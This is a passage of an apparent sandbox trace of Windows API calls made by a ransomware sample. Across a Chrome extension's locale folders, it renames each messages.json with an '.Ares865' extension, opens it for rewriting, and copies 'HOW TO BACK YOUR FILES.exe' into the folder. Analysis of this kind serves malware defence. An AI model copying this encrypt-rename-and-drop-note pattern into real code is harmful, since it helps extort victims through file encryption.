lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.852] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.852] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.Ares865") returned 164 [0102.852] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.854] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=273) returned 1 [0102.859] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi" [0102.859] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi" [0102.859] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.859] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.860] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.860] GetLastError () returned 0x0 [0102.861] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.861] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86fef9d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ecbde80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ecbde80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.861] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.861] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.861] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.Ares865") returned 161 [0102.861] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.862] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.863] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=279) returned 1 [0102.867] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk" [0102.867] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk" [0102.867] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.867] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.867] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.868] GetLastError () returned 0x0 [0102.868] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.868] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86fef9d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ecbde80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ecbde80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.868] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.868] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.868] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.Ares865") returned 161 [0102.868] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.870] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=353) returned 1 [0102.873] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr" [0102.873] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr" [0102.873] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.873] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.874] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.874] GetLastError () returned 0x0 [0102.874] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.874] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86fef9d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ecbde80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ecbde80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.874] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.875] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.875] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.Ares865") returned 161 [0102.875] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.877] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=270) returned 1 [0102.880] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th" [0102.881] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th" [0102.881] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.881] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.881] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.882] GetLastError () returned 0x0 [0102.882] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.882] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86fef9d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ece3fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ece3fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.882] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.882] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.882] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.Ares865") returned 161 [0102.882] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.884] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=356) returned 1 [0102.891] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv" [0102.891] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv" [0102.891] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.891] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.892] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.892] GetLastError () returned 0x0 [0102.892] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.892] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86fc9870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ece3fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ece3fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.893] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.893] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.893] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.Ares865") returned 161 [0102.893] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.ares865"), 